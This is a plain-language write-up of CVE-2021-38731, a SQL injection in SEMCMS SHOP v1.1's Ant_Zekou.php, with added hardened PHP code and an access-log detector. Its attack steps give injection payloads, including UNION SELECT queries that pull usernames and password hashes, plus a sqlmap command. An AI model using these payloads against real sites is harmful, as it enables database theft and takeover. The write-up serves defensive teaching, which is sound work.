In 2021, a critical SQL injection vulnerability was discovered in SEMCMS SHOP version 1.1, affecting the Ant_Zekou.php script. This security hole could let attackers tamper with your online store’s database, read sensitive information, and possibly escalate the attack further. Let’s break down what happened, how the exploit works, and what you can do about it—all in plain English.
## What is SEMCMS SHOP v1.1?
SEMCMS SHOP is a PHP-based open-source e-commerce solution mainly used in China. Version 1.1 gained popularity as a free way for small businesses to get an online shop up and running. The problem? Its security only goes so far, and, as this case shows, a single unchecked script can compromise the whole operation.
## The Vulnerability: SQL Injection in Ant_Zekou.php
SQL injection is a classic web exploit. If web code fails to properly sanitize (clean up or check) user input before placing it into a database query, an attacker can slip malicious SQL into that query.

In SEMCMS SHOP v1.1, the Ant_Zekou.php file is at fault: by manipulating the right request parameter, an attacker can inject custom SQL commands into the query the script runs.
Here’s the type of code you might see in Ant_Zekou.php:

```php
<?php
// This is a simplified version for demonstration.
// $conn is assumed to be an already-open mysqli connection.
$id = $_GET['id'];                                   // raw, unvalidated user input
$query = "SELECT * FROM products WHERE id = $id";    // input is pasted straight into the SQL
$result = mysqli_query($conn, $query);
?>
```
Notice the line:

```php
$query = "SELECT * FROM products WHERE id = $id";
```

If someone sends `?id=1`, that's fine—the server looks up product 1. But what if someone sends:

```
?id=1 OR 1=1
```

The query becomes:

```sql
SELECT * FROM products WHERE id = 1 OR 1=1
```

This always returns all rows in your products table! And if an attacker gets really crafty, they can extract entire tables or even drop data.
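The fix the summary table below calls for, shown as an added example (this is not SEMCMS code and not the patched Ant_Zekou.php): the same product lookup with the id validated as a positive integer and passed to the database through a mysqli prepared statement. The `$conn` variable, the `products` column names and the `find_product` helper are assumptions for the example; `get_result()` additionally assumes the mysqlnd driver.

```php
<?php
// Added example: hardened version of the product lookup from Ant_Zekou.php.
// Assumes $conn is an open mysqli connection, as in the vulnerable snippet.

/**
 * Look up a product by id using a prepared statement.
 * Returns the row as an associative array, or null if the id is invalid
 * or no such product exists. The id value never becomes part of the SQL text.
 */
function find_product(mysqli $conn, $raw_id): ?array
{
    // 1. Validate the shape first: a product id is a positive integer.
    //    Values such as "1 OR 1=1" or "1' OR '1'='1" fail this check outright
    //    (filter_var also returns false for arrays, e.g. ?id[]=1).
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterize: the placeholder is bound as an integer, so even a
    //    well-formed value can never be interpreted as SQL by the server.
    $stmt = $conn->prepare('SELECT id, name, price FROM products WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();

    $row = $stmt->get_result()->fetch_assoc();   // requires mysqlnd (assumption)
    $stmt->close();

    return $row ?: null;
}

// Usage in the request handler: reject bad input with a 404 instead of
// letting it reach the database at all.
$product = find_product($conn, $_GET['id'] ?? '');
if ($product === null) {
    http_response_code(404);
    exit('Product not found');
}
// Escape on output as well, so stored data cannot turn into script in the page.
echo htmlspecialchars($product['name'], ENT_QUOTES, 'UTF-8');
```

Both layers matter: validation keeps junk out of the application early and gives you a clean place to log rejected requests, while the prepared statement is what actually guarantees the database never sees user input as code, even if a future change loosens the validation.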
## Step 1: Testing for Injection

Attackers start by changing the id value in the GET request:

```
http://example.com/Ant_Zekou.php?id=1
```

Then they test with SQL logic:

```
http://example.com/Ant_Zekou.php?id=1' OR '1'='1
```

If both return a valid product list, the parameter is likely injectable.
## Step 2: Extracting Information
Knowing that the parameter is injectable, the attacker can enumerate the database. For instance:

```
?id=1 UNION SELECT 1, user(), database(), version(), 4#
```

From there the attacker can pull sensitive data (like emails, usernames, and password hashes):

```
?id=1 UNION SELECT 1, username, password, 4 FROM users#
```
## Complete Exploit Example Using SQLMap
SQLMap is an open-source penetration testing tool that automates exploiting SQL injection flaws. Here’s how an attacker could use it:

```
sqlmap -u "http://example.com/Ant_Zekou.php?id=1" --dbs
```

This tries to find all the databases on your shop’s server.
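On the defensive side, the probes from Step 1, Step 2 and the sqlmap run above all leave a recognisable trace in the web server access log: requests to Ant_Zekou.php whose `id` is anything other than a positive integer, and (for an untuned sqlmap run) a User-Agent that names the tool. The following added example, which is not part of SEMCMS or of the original write-up, scans combined-format log lines for exactly those two signals. The sample log lines, IP addresses and user-agent strings are constructed for the example, and `parse_combined`, `suspicious_reasons` and `scan_log` are hypothetical helper names.

```php
<?php
// Added example: flag injection probes against Ant_Zekou.php in access logs.
// Log lines, IPs and user agents below are constructed, not real traffic.

/**
 * Parse one line in Apache/Nginx "combined" format into its fields.
 * Returns null if the line does not match the expected layout.
 */
function parse_combined(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

/**
 * Return the reasons a request looks like an injection attempt against
 * Ant_Zekou.php; an empty array means nothing suspicious was seen.
 */
function suspicious_reasons(array $req): array
{
    $reasons = [];
    $url = parse_url($req['target']);
    if (($url['path'] ?? '') !== '/Ant_Zekou.php') {
        return $reasons;                 // only the vulnerable script is in scope here
    }
    parse_str($url['query'] ?? '', $params);   // URL-decodes, so %20OR%20 becomes " OR "
    $id = $params['id'] ?? null;

    // The legitimate parameter is a positive integer; anything else is a probe.
    if ($id !== null
        && filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) === false) {
        $reasons[] = 'id is not a positive integer: ' . var_export($id, true);
    }
    // An untuned sqlmap run announces itself in the User-Agent header.
    if (stripos($req['ua'], 'sqlmap') !== false) {
        $reasons[] = 'sqlmap user agent';
    }
    return $reasons;
}

/** Scan log lines and return [line index => reasons] for every hit. */
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        $req = parse_combined($line);
        if ($req === null) {
            continue;
        }
        $reasons = suspicious_reasons($req);
        if ($reasons) {
            $hits[$i] = $reasons;
        }
    }
    return $hits;
}

// Constructed sample lines: a normal lookup, the "1 OR 1=1" probe from the
// write-up, a request carrying a sqlmap user agent, and unrelated traffic.
$sample = [
    '203.0.113.5 - - [28/Oct/2022:16:15:00 +0000] "GET /Ant_Zekou.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Oct/2022:16:15:02 +0000] "GET /Ant_Zekou.php?id=1%20OR%201=1 HTTP/1.1" 200 9812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Oct/2022:16:15:03 +0000] "GET /Ant_Zekou.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.6 (https://sqlmap.org)"',
    '198.51.100.7 - - [28/Oct/2022:16:16:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach (scan_log($sample) as $i => $reasons) {
    echo "line $i: " . implode('; ', $reasons) . PHP_EOL;
}
```

Treat the User-Agent match as a weak signal only; the tool's user agent is trivially changed, so the non-numeric `id` check is the one worth alerting on. The same shape check is also the one the hardened code should enforce, which makes a hit in the log a useful test of whether the patch is actually deployed: after the fix, every flagged request should correspond to a 404 in the status column rather than a 200.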
## Impact

- Modified site contents: Attackers could alter products, prices, or site functions.
- Complete takeover: If the attacker can write to the database, it may be possible to create admin accounts or implant backdoors.
## The Official Reference

- [NVD Listing - CVE-2021-38731](https://nvd.nist.gov/vuln/detail/CVE-2021-38731)
- [VulDB Entry](https://vuldb.com/?id.181533)
## Summary Table

| Risk Level | Where         | What You Lose                | How to Fix              |
|------------|---------------|------------------------------|-------------------------|
| High       | Ant_Zekou.php | Full database access         | Patch input, update PHP |
| Medium     | All forms     | Some data, possible takeover | Use prepared statements |
| Low        | After patch   | None                         | Stay up to date         |
## Final Thoughts
CVE-2021-38731 is a textbook example of why secure coding matters. One line of PHP, left unchecked, can mean the difference between a thriving webshop and a total disaster. Always validate, sanitize, and update—before someone else does it for you.
## Resources
- https://nvd.nist.gov/vuln/detail/CVE-2021-38731
- https://vuldb.com/?id.181533
- SQLMap
## Timeline
Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:48:00 UTC